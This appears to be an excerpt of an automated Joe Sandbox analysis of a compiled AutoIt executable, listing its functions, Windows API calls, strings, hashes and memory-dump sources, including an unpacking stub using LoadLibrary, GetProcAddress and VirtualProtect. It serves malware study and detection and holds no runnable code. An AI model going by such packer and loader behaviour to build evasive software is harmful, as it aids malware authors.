                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                        • API String ID: 529118366-3287110873
                                        • Opcode ID: 4d23b9c6d6a63d94c3ba63cad3b5bcbfd79e210796daf9ad2d28163dde81bdfb
                                        • Instruction ID: 3775c2483fe015773c632b681b03d612dd4f800abf390d95848d4825fbab2a57
                                        • Opcode Fuzzy Hash: 4d23b9c6d6a63d94c3ba63cad3b5bcbfd79e210796daf9ad2d28163dde81bdfb
                                        • Instruction Fuzzy Hash: 3751E87490824DBBCF11FBB4DC05DED7BB4AB16704B105169F85DB21A2DAB08705EB22
                                        Function 00E83633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00E836D2
                                        • KillTimer.USER32(?,00000001), ref: 00E836FC
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E8371F
                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E8372A
                                        • CreatePopupMenu.USER32 ref: 00E8373E
                                        • PostQuitMessage.USER32(00000000), ref: 00E8375F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                        • String ID: TaskbarCreated
                                        • API String ID: 157504867-2362178303
                                        • Opcode ID: 698a1207bd5f2a3df22d58413c36ecefe23670d2eed878cff730e09ea5481f7b
                                        • Instruction ID: 5c456aaff0bc52bfd145af91423283ccb1728dd9e24018bf26a135a76a273029
                                        • Opcode Fuzzy Hash: 698a1207bd5f2a3df22d58413c36ecefe23670d2eed878cff730e09ea5481f7b
                                        • Instruction Fuzzy Hash: 9541E8B1104149B7DF24BB38DC09BBE3794EB12700F142529F90DF62A2EAA19A45B763
                                        Function 00E84FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E84FF9
                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E84EEE,?,?,00000000,00000000), ref: 00E85010
                                        • LoadResource.KERNEL32(?,00000000,?,?,00E84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E84F8F), ref: 00EBDD60
                                        • SizeofResource.KERNEL32(?,00000000,?,?,00E84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E84F8F), ref: 00EBDD75
                                        • LockResource.KERNEL32(N,?,?,00E84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E84F8F,00000000), ref: 00EBDD88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                        • String ID: SCRIPT$N
                                        • API String ID: 3051347437-3852340653
                                        • Opcode ID: 4dd6143d0194331fef1c6bc3acd78229d9051e7dc8af089bf676796bde384281
                                        • Instruction ID: cff976cf2645bb55c9c9d56331425d1561372678e3c958ad07f466362d94e118
                                        • Opcode Fuzzy Hash: 4dd6143d0194331fef1c6bc3acd78229d9051e7dc8af089bf676796bde384281
                                        • Instruction Fuzzy Hash: CA119A75200704AFD7319B65DC48F677BB9FBC9B11F208568F40AA6660DB61E8049660
                                        Function 00E84AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 00E84B2B
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                        • GetCurrentProcess.KERNEL32(?,00F0FAEC,00000000,00000000,?), ref: 00E84BF8
                                        • IsWow64Process.KERNEL32(00000000), ref: 00E84BFF
                                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E84C45
                                        • FreeLibrary.KERNEL32(00000000), ref: 00E84C50
                                        • GetSystemInfo.KERNEL32(00000000), ref: 00E84C81
                                        • GetSystemInfo.KERNEL32(00000000), ref: 00E84C8D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                        • String ID:
                                        • API String ID: 1986165174-0
                                        • Opcode ID: 314e6b8118d025a97e6cf9ce13c0f4684e4dc048d3594600ba6caf8ecabea281
                                        • Instruction ID: e4433e16a8e8382cadb4df4ff79d8714ca836751c5677e6551bfb339e9f37e38
                                        • Opcode Fuzzy Hash: 314e6b8118d025a97e6cf9ce13c0f4684e4dc048d3594600ba6caf8ecabea281
                                        • Instruction Fuzzy Hash: CE91E57154EBC5DEC731EB6888511EBFFE4AF26304B48595ED0CFA3A41D224E908D719
                                        Function 00F98070 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(?), ref: 00F981AA
                                        • GetProcAddress.KERNEL32(?,00F91FF9), ref: 00F981C8
                                        • ExitProcess.KERNEL32(?,00F91FF9), ref: 00F981D9
                                        • VirtualProtect.KERNELBASE(00E80000,00001000,00000004,?,00000000), ref: 00F98227
                                        • VirtualProtect.KERNELBASE(00E80000,00001000), ref: 00F9823C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                        • String ID:
                                        • API String ID: 1996367037-0
                                        • Opcode ID: 0a0ba8430e0f6f890d9e441bdd86e8ddb72da2ca5b642b42065c3c4eaf24e4d4
                                        • Instruction ID: eb1c074b86aed675317035491e8594e2ef5a8b4cb6cf7fde6a80100693c962bf
                                        • Opcode Fuzzy Hash: 0a0ba8430e0f6f890d9e441bdd86e8ddb72da2ca5b642b42065c3c4eaf24e4d4
                                        • Instruction Fuzzy Hash: A451F772E457524AEF208E78DC807A1B794EB533B47280738C5E2CB3D6EF94584BA760
                                        Function 00EE4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,00EBE7C1), ref: 00EE46A6
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00EE46B7
                                        • FindClose.KERNEL32(00000000), ref: 00EE46C7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FileFind$AttributesCloseFirst
                                        • String ID:
                                        • API String ID: 48322524-0
                                        • Opcode ID: 09e8cb35d0ad9e45af8dcbd2edbf8776011f7160f8fcaf673d81948205b455a9
                                        • Instruction ID: 14dec30f42ce9f6a9c476b8eae8c88fb7d0a1632de6d485b388d318187d8370a
                                        • Opcode Fuzzy Hash: 09e8cb35d0ad9e45af8dcbd2edbf8776011f7160f8fcaf673d81948205b455a9
                                        • Instruction Fuzzy Hash: 35E020714104095BC220B738EC4D8EA775CEE06335F100715F935D14E0E7B06D5495D5
                                        Function 00E90B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E90BBB
                                        • timeGetTime.WINMM ref: 00E90E76
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E90FB3
                                        • TranslateMessage.USER32(?), ref: 00E90FC7
                                        • DispatchMessageW.USER32(?), ref: 00E90FD5
                                        • Sleep.KERNEL32(0000000A), ref: 00E90FDF
                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 00E9105A
                                        • DestroyWindow.USER32 ref: 00E91066
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E91080
                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00EC52AD
                                        • TranslateMessage.USER32(?), ref: 00EC608A
                                        • DispatchMessageW.USER32(?), ref: 00EC6098
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EC60AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                        • API String ID: 4003667617-3242690629
                                        • Opcode ID: f6b06a90fbb23a9692d171b8f6b879053d1aa77bbe390ece15fa811518a6a00d
                                        • Instruction ID: a2a77bbe0a92ee2f69b50c664ac191c43710199179107478d33d7346d5e1d3da
                                        • Opcode Fuzzy Hash: f6b06a90fbb23a9692d171b8f6b879053d1aa77bbe390ece15fa811518a6a00d
                                        • Instruction Fuzzy Hash: 4FB2F471608741DFDB28DF24C984FAAB7E4FF84308F14591DE49AA72A1DB71E885CB42
                                        Function 00EE93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EE91E9: __time64.LIBCMT ref: 00EE91F3
                                          • Part of subcall function 00E85045: _fseek.LIBCMT ref: 00E8505D
                                        • __wsplitpath.LIBCMT ref: 00EE94BE
                                          • Part of subcall function 00EA432E: __wsplitpath_helper.LIBCMT ref: 00EA436E
                                        • _wcscpy.LIBCMT ref: 00EE94D1
                                        • _wcscat.LIBCMT ref: 00EE94E4
                                        • __wsplitpath.LIBCMT ref: 00EE9509
                                        • _wcscat.LIBCMT ref: 00EE951F
                                        • _wcscat.LIBCMT ref: 00EE9532
                                          • Part of subcall function 00EE922F: _memmove.LIBCMT ref: 00EE9268
                                          • Part of subcall function 00EE922F: _memmove.LIBCMT ref: 00EE9277
                                        • _wcscmp.LIBCMT ref: 00EE9479
                                          • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AAE
                                          • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AC1
                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EE96DC
                                        • _wcsncpy.LIBCMT ref: 00EE974F
                                        • DeleteFileW.KERNEL32(?,?), ref: 00EE9785
                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EE979B
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EE97AC
                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EE97BE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                        • String ID:
                                        • API String ID: 1500180987-0
                                        • Opcode ID: 2f354fd26af39d8e6632110fef49c51a42ee3d4ee6181d862f9c7c3d6112c9c2
                                        • Instruction ID: cc9e2c2aa72aafb2be144ae738e2ed6b79fbf5b1b936f633bf538dab8ebab570
                                        • Opcode Fuzzy Hash: 2f354fd26af39d8e6632110fef49c51a42ee3d4ee6181d862f9c7c3d6112c9c2
                                        • Instruction Fuzzy Hash: 0BC12CB1D0021DAADF21DF95CC85ADEB7FDAF49310F0050AAF609F6152EB709A848F65
                                        Function 00E871EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E84864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F462F8,?,00E837C0,?), ref: 00E84882
                                          • Part of subcall function 00EA074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E872C5), ref: 00EA0771
                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E87308
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EBECF1
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EBED32
                                        • RegCloseKey.ADVAPI32(?), ref: 00EBED70
                                        • _wcscat.LIBCMT ref: 00EBEDC9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                        • API String ID: 2673923337-2727554177
                                        • Opcode ID: d0b534d1fc3bd556a690617b3270bad26c620e60bcf9fee1946b2694b0be4a99
                                        • Instruction ID: b5b10875f8817b1c7f1af7063a176181079f7dc386698c7d8d036140da1737ba
                                        • Opcode Fuzzy Hash: d0b534d1fc3bd556a690617b3270bad26c620e60bcf9fee1946b2694b0be4a99
                                        • Instruction Fuzzy Hash: ED716E755083059EC314FF65DC8189BBBE8FF59740B40542EF849A72A1DBB0DA48DF92
                                        Function 00E83A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00E83A62
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00E83A71
                                        • LoadIconW.USER32(00000063), ref: 00E83A88
                                        • LoadIconW.USER32(000000A4), ref: 00E83A9A
                                        • LoadIconW.USER32(000000A2), ref: 00E83AAC
                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E83AD2
                                        • RegisterClassExW.USER32(?), ref: 00E83B28
                                          • Part of subcall function 00E83041: GetSysColorBrush.USER32(0000000F), ref: 00E83074
                                          • Part of subcall function 00E83041: RegisterClassExW.USER32(00000030), ref: 00E8309E
                                          • Part of subcall function 00E83041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E830AF
                                          • Part of subcall function 00E83041: LoadIconW.USER32(000000A9), ref: 00E830F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 2880975755-4155596026
                                        • Opcode ID: e1f90c0a547491bc6ffe3b061feb4dca88098706c130b0917a730a713b4dcfec
                                        • Instruction ID: 98c1ba6c66f1700368dc6a796a8ffafb5afbf95dce3753cce8cd283ae86c4781
                                        • Opcode Fuzzy Hash: e1f90c0a547491bc6ffe3b061feb4dca88098706c130b0917a730a713b4dcfec
                                        • Instruction Fuzzy Hash: 7A211975900308BFEF10DFA4EC09B9D7BB4FB1A711F00412AE904E62A0D3BA5654AF96
                                        Function 00E83778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                        • API String ID: 1825951767-3513169116
                                        • Opcode ID: 1ab8b38c072ba5ad877e43422404823ee9837726c7af47db3f966776feb9cc8b
                                        • Instruction ID: 9fae33047d6a8880c50b3e752a7083fcfa6f00a0870ee699927556b9be9b2d92
                                        • Opcode Fuzzy Hash: 1ab8b38c072ba5ad877e43422404823ee9837726c7af47db3f966776feb9cc8b
                                        • Instruction Fuzzy Hash: 00A16E7191021DAACF14FBA0CC95AEEB7B8BF15700F44142AF41EB7192EF749A09DB61
                                        Function 00E83015 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 71registrywindowclipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00E83074
                                        • RegisterClassExW.USER32(00000030), ref: 00E8309E
                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E830AF
                                        • LoadIconW.USER32(000000A9), ref: 00E830F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 975902462-1005189915
                                        • Opcode ID: 338280fb25340807112e4c572e45c8cb66c7c519c295961fb70215f328df3954
                                        • Instruction ID: a3c0a0d6f3bd64b99f9d6f8dac0b017ad9c953b3277f0364fbc7b3aba1d9cb7a
                                        • Opcode Fuzzy Hash: 338280fb25340807112e4c572e45c8cb66c7c519c295961fb70215f328df3954
                                        • Instruction Fuzzy Hash: CF3116B5940309AFDB50DFA4E885ACDBBF0FB1A710F10452AE990E62A0D3B54549EF92
                                        Function 00E83041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54registrywindowclipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00E83074
                                        • RegisterClassExW.USER32(00000030), ref: 00E8309E
                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E830AF
                                        • LoadIconW.USER32(000000A9), ref: 00E830F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 975902462-1005189915
                                        • Opcode ID: dbfad59e15f111ecb3c612fe606ef564d2263adc54b23eca85f6d77e84aebd85
